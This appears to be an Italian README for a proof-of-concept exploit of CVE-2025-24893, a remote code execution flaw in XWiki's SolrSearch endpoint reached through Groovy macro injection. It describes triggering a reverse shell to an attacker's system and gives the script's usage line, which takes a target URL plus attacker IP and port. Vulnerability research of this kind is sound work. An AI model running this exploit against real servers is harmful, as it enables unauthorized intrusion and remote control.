
Reverse Shell Payload per CVE-2025-24893
PoC per CVE-2025-24893 – Esecuzione di Codice Remoto tramite Macro
<groovy>in XWiki
Ispirato dal PoC originale di Artemir
Questo è un exploit Proof-of-Concept (PoC) per CVE-2025-24893, una vulnerabilità di Esecuzione di Codice Remoto (RCE) nelle versioni vulnerabili di XWiki.
Il difetto risiede nella sanitizzazione inadeguata dell'input utente all'interno dell'endpoint SolrSearch, che è vulnerabile all'iniezione della macro <groovy> non sandboxed tramite una query RSS.
Questo script inietta un payload Groovy utilizzando la macro async che porta all'esecuzione di comandi sul server, consentendo a un attaccante di attivare una reverse shell verso il proprio sistema.
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>